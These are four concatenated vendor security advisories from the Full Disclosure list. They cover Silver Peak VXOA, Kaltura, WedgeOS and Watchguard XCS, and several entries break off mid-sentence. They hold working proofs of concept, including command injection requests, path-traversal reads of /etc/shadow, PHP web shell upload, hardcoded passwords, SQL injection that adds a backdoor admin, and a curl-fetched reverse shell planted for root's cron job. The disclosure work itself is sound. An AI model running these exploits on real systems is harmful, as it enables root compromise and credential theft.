[FD] Silver Peak VXOA Multiple Vulnerabilities
(, ) (, . '.' ) ('.', ). , ('. ( ) ( (_,) .'), ) _ _, / _/ / _ \ _ \ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ |\\ \__( <_> ) Y Y \ /__ /\___|__ / \___ >/|__|_| / \/ \/.-.\/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Silver Peak VXOA Multiple Vulnerabilities Affected versions: Silver Peak VX < 6.2.11 PDF: http://www.security-assessment.com/files/documents/advisory/Silverpeak-Advisory-Final.pdf +---+ |Description| +---+ The Silver Peak VX virtual appliance running VXOA before version 6.2.11 contains a number of security vulnerabilities, including command injection, unauthenticated file read, mass assignment, shell upload, and hardcoded credentials. By combining these vulnerabilities, an attacker may remotely obtain root privileges on the underlying host. ++ |Exploitation| ++ ==Command Injection== A user with administrative access to the REST JSON interface of the VX web server may execute arbitrary commands on the operating system. The injection point lies in the "snmp" call, which does not sanitise the "auth_key" parameter before including it in an executed command string. The following command injection PoC writes the user's id to a file on the filesystem. [Command Injection PoC] POST /rest/json/snmp HTTP/1.1 Host: [HOST] Content-Type: application/json; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 368 Cookie: connect.sid=[VALID]; {"access":{"rocommunity":"public"},"listen":{"enable":true},"traps":{"trap_community":"public","enable":true},"auto_launch":true,"sysdescr":"", "syscontact":"","syslocation":"","v3":{"users":{"admin":{"hash_type":"sha","auth_key":"a;echo `id` > /var/tmp/cmd_inj","self":"admin","privacy_key":"","privacy_type":"aes-128","enable":false}}},"encAuth":false,"encPri":false} ==Unauthenticated File Read== A user with the ability to access the VX web server interface may make an unauthenticated call to a web interface function that allows them to read arbitrary files on the disk with the permission of the web server user "apache". Two functions are affected by this vulnerability, "save_file.php" and "save_config_file.php". [Unauthenticated File Read PoC] curl -sk "https://[HOST]/6.2.5.0_52054/php/save_file.php?ftype=log&fname=../../etc/passwd"; OR curl -sk "https://[HOST]/6.2.5.0_52054/php/save_config_file.php?filename=../../../../../../../../etc/passwd"; ==Mass Assignment== A user with access to the REST JSON interface of the VX web server may alter undocumented parameters of the "users" call, allowing them to change a user's login shell to bash. This can be used to evade the limited subshell enforced by the SSH server on the appliance. [Mass assignment PoC] POST /rest/json/users HTTP/1.1 Host: [HOST] Content-Type: application/json; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 366 Cookie: connect.sid=[VALID]; {"users":{"basic":{"self":"basic","enable":true,"gid":0,"password":"[SNIP]","shell":"/bin/bash"}},[SNIP other users]}} ==Shell Upload== A user with monitor or administrative access to the web interface of the VX web server may upload a PHP shell in order to execute arbitrary commands as the web server user "apache". A POST request containing the PHP shell is made to the "configdb_file.php" endpoint. This uploads the shell to a directory with a randomly generated name corresponding to the user's SOAP interface session. This random value may be obtained from "home.php", and the uploaded shell accessed within that directory. The following PoC details uploading the shell, obtaining the SOAP directory name, and using the shell. [Shell upload PoC] POST /6.2.5.0_52054/php/configdb_file.php?seenform=1 HTTP/1.1 Host: [HOST] Cookie: PHPSESSID=[VALID]; Content-Type: multipart/form-data; boundary=---18932870311933452824851992207 Content-Length: 301 -18932870311933452824851992207 Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: text/html -18932870311933452824851992207 #End of request $curl -sk -b 'PHPSESSID=[VALID]' "https://[HOST]/6.2.5.0_52054/php/home.php"; | grep "flowFile" var flowFile = "/opt/tms/lib/web/content/webui/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/"; $curl -sk "https://[HOST]/6.2.5.0_52054/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/shell.php?cmd=id"; uid=48(apache) gid=48(apache) groups=48(apache) ==Hardcoded Account== The "spsadmin" account is predefined in the VX appliance, and is hidden from user account lists in the web and subshell interfaces. The account has a hardcoded password of "Silverpeak123", and cannot be logged into through the regular web interface, or the subshell over SSH. However, the account can l
[FD] Kaltura Community Edition Multiple Vulnerabilities
(, ) (, . '.' ) ('.', ). , ('. ( ) ( (_,) .'), ) _ _, / _/ / _ \ _ \ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ |\\ \__( <_> ) Y Y \ /__ /\___|__ / \___ >/|__|_| / \/ \/.-.\/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Kaltura Community Edition Multiple Vulnerabilities Affected versions: Kaltura Community Edition <=11.1.0-2 PDF: http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf +---+ |Description| +---+ The Kaltura platform contains a number of vulnerabilities, allowing unauthenticated users to execute code, read files, and access services listening on the localhost interface. Vulnerabilities present in the application also allow authenticated users to execute code by uploading a file, and perform stored cross site scripting attacks from the Kaltura Management Console into the admin console. Weak cryptographic secret generation allows unauthenticated users to bruteforce password reset tokens for accounts, and allows low level users to perform privilege escalation attacks. ++ |Exploitation| ++ ==Unserialize Code Execution== The following PHP POC will generate an object that leads to code execution when posted to an endpoint present on the server. Authentication is not required. [POC] The Base64 encoded object generated above should be included in the kdata section of the following curl request: $curl http://[HOST]/index.php/keditorservices/redirectWidgetCmd?kdata=$[sploit] ==Arbitrary File Upload== Users authenticated to the KMC with appropriate privileges can upload arbitrary files through the "Upload Content" functionality. This can be used to upload a PHP web shell as an image file and gain command execution. In order to excute the code, the on-disk path of the uploaded file must be obtained, and then browsed to directly. Obtaining the uploaded file's path can be achieved with the following command. [POC] $curl http://[HOST]/index.php/keditorservices/getAllEntries?list_type=1&entry_id=0_3v2568rx -b "[Valid Cookie]" Directly accessing the path "url" returned by the above request will result in the exceution of the uploaded php script. $curl http://[HOST]/[URL PATH] ==SSRF / File Read (Limited)== A limited number of files on the host can be read by passing a "file://" protocol handler to a CURL call. [POC] $curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=file://127.0.0.1/opt/kaltura/app/configurations/local.ini Arbitrary IP addresses can be supplied, resulting in an SSRF issue. The following POC uses the SSRF issue to send a command and retrieve statistics from memcached listening on localhost, which is present in a default Kaltura install. [POC] $curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211 -m 2 --data $'b=set nl 0 60 4\n\n\n\n\n' $curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211 --data "c=get nl&d=stats&e=quit" +--+ | Solution | +--+ Upgrading to the most recent version of Kaltura (11.7.0-2) will fix the majority of these issues. No fixes are available for some of the issues disclosed, so carefully firewalling off the Kaltura interface is recommended. ++ | Additional | ++ A disclosure timeline, further information and additional less critical vulnerabilities are available in the accompanying PDF. http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WedgeOS Multiple Vulnerabilities
(, ) (, . '.' ) ('.', ). , ('. ( ) ( (_,) .'), ) _ _, / _/ / _ \ _ \ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ |\\ \__( <_> ) Y Y \ /__ /\___|__ / \___ >/|__|_| / \/ \/.-.\/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. WedgeOS Multiple Vulnerabilities Affected versions: WedgeOS <= 4.0.4 PDF: http://www.security-assessment.com/files/documents/advisory/WedgeOS-Final.pdf +---+ |Description| +---+ Wedge Networks WedgeOS Virtual Appliance contains a number of security vulnerabilities, including unauthenticated arbitrary file read as root, command injection in the web interface, privilege escalation to root, and command execution via the system update functionality. ++ |Exploitation| ++ ==Unauthenticated Arbitrary File Read== Any user with access to the web interface of WedgeOS may submit a GET request to the ssgimages function, using directory traversal to specify an arbitrary file on disk. The web server runs as root, so any file may be read, including the shadow file. This vulnerability can be used to read the contents of the local MySQL database, which contains MD5 password hashes for the web interface. [POC] curl -sk 'https://[HOST]/ssgmanager/ssgimages?name=../../../../../etc/shadow' | head -n 1 root:$1$KVY2OJDj$Xg5LkGQI3lUvzr8GVIErp/:15828:0:9:7::: ==Command Injection== Any authenticated user may execute arbitrary commands as root. The ping, nslookup, and traceroute functions of the diagnostic interface fail to validate user input correctly, which allows the injection of arbitrary system commands. Bash brace expansion can be used to execute more syntactically complex commands. [POC] POST /ssgmanager/jsp/readaccess/ping.jsf HTTP/1.1 Host: [HOST] Cookie: JSESSIONID=[SESSION]; Content-Type: application/x-www-form-urlencoded Content-Length: 123 mainform=mainform&mainform:input=1%26id&mainform:submitGo=Go&mainform:j_id_jsp_208968386_10pc4=&javax.faces.ViewState=j_id3 ==Privilege Escalation== A remote user with access to the 'support' account over SSH can escalate privileges to root by using way of the admin account. The support account can be accessed with the password "ous35hi3". This gives the user a bash shell. If the support user knows the password for the admin user, they can switch to the admin user and launch a bash shell. Otherwise, the admin password can be reset by logging in with the resetpassword user, or by accessing the local MySQL database and cracking the admin hash. The database can be accessed with the "root" user and password "wecandoit". Once the user has the admin password, they can switch to the admin user and spawn a bash shell by executing the following command: su -s /bin/bash admin With a bash shell as the admin user, there are multiple methods to escalate to root. If the file at /var/tmp/secfi_update.sh does not exist, this can be created and executed as root with sudo. However this file is created when updating the system, so it may not be possible. The admin user can also escalate privileges to root by creating a specific directory path in any location where they have write access, and exploiting environment variables when running the ctl_snort.sh script via sudo. [POC] -Read admin password from DB- ssh support@[HOST] support@[HOST]'s password: [ous35hi3] [support@wedgevm ~]$ mysql -u root --password=wecandoit ssgmanager -e 'select password from admin;' +--+ | password | +--+ | [PASSWORD] | +--+ -Reset admin password with support user- ssh resetpassword@[HOST] resetpassword@[HOST]'s password: [default!] Reset password for admin (y/n)? y Resetting admin password... Admin password has been reset to default. Connection to [HOST] closed. -Privesc via environment variables and sudo- [support@wedgevm ~]$ su -s /bin/bash admin Password: [admin] (Default password) [admin@wedgevm support]$ export GUARDIAN_HOME=/var/tmp [admin@wedgevm support]$ mkdir -p /var/tmp/shared/script [admin@wedgevm support]$ echo "id > /var/tmp/id" > /var/tmp/shared/script/query_license.sh [admin@wedgevm support]$ chmod +x /var/tmp/shared/script/query_license.sh [admin@wedgevm support]$ sudo /usr/local/snort/bin/ctl_snort.sh start -mode ids Error: specify the snort configuration file with -config [admin@wedgevm support]$ cat /var/tmp/id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [admin@wedgevm support]$ ==Command Execution== An admin user with write access to the web interface may execute arbitrary commands as root. The user can specify an external server with which to retrieve system updates. The WedgeOS requests a shell script from the remote host and runs it as root. No validation of
[FD] Watchguard XCS Multiple Vulnerabilities
(, ) (, . '.' ) ('.', ). , ('. ( ) ( (_,) .'), ) _ _, / _/ / _ \ _ \ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ |\\ \__( <_> ) Y Y \ /__ /\___|__ / \___ >/|__|_| / \/ \/.-.\/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Watchguard XCS Multiple Vulnerabilities Affected versions: Watchguard XCS <=10.0 PDF: http://www.security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf +---+ |Description| +---+ The Watchguard XCS virtual appliance contains a number of vulnerabilities, including unauthenticated SQL injection, command execution and privilege escalation. By combining these vulnerabilities, an attacker may remotely obtain root privileges on the underlying host. ++ |Exploitation| ++ ==SQL Injection== Unauthenticated SQL injection is possible through the “sid” cookie parameter in the Watchguard XCS web interface due to a PHP script that insecurely constructs an SQL query using that value. Stacked queries are possible, and allow insertion of a backdoor web interface user into the database. The following POC shows the insertion of a backdoor user, and a python snippet that can be used to construct the Watchguard XCS specific password hashes. [SQLi POC] GET /borderpost/imp/compose.php3 HTTP/1.1 Host: [HOST] Cookie: sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(99, 'backdoor', '0b75e2443d3c813d91ac5b91106a70ad', 0, 'server_admin', 0, 0)-- [Python Password Hash Generator] import hashlib def gen_hash(pass_clear): PRE_SALT = "BorderWare " POST_SALT = " some other random (9) stuff" t1 = hashlib.md5(PRE_SALT + pass_clear + POST_SALT).hexdigest() t2 = hashlib.md5(pass_clear + t1).hexdigest() return t2 print gen_hash("backdoor") ==Command Injection== The web interface of XCS contains a command injection vulnerability, allowing an authenticated web application user to execute system commands as the "nobody" user. The vulnerability is in the id parameter of the "mailqueue.spl" page. [POC] GET /ADMIN/mailqueue.spl?f=dnld&id=;id;uname%20-a Host: [HOST] Cookie: [VALID COOKIE] ==Privilege Escalation== Privilege Escalation There are multiple methods to escalate privileges to root after obtaining a shell. The "FixCorruptMail" script exploit is shown below, an additional method is detailed in the accompanying PDF. Privilege escalation is possible by exploiting the /usr/local/bin/FixCorruptMail script when it is called by root's crontab every three minutes. This script reads a file “badqids” from the /var/tmp directory, and constructs a shell command using some of the contents. [POC] touch /tmp/dummyfile /usr/local/sbin/curl -s http://[REVERSE_SHELL.elf] -o /tmp/revshell chmod +x /tmp/revshell echo "../../../../../../tmp/dummyfile;/tmp/revshell" > /var/tmp/badqids The executable "/tmp/revshell" will be executed within three minutes by the root user. +--+ | Solution | +--+ Apply the relevant XCS security hotfix (Build 150522) as provided by Watchguard. +---+ |Disclosure Timeline| +---+ 12/05/2015 - Email sent to confirm vendor security contact address is valid. 13/05/2015 - Response from vendor confirming address is valid. 13/05/2015 - Sent advisory through to vendor. 13/05/2015 - Vendor confirms receipt of advisory. 27/05/2015 - Vendor sends update on fixes, states a release will be published shortly. 09/06/2015 - Security hotfixes released for Watchguard XCS v10.0 and v9.2. 29/06/2015 - Public advisory release. +-+ |About Security-Assessment.com| +-+ Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us: Web www.security-assessment.com Email info () security-assessment.com Phone +64 4 470 1650 ___ Sent through the Full Disclosure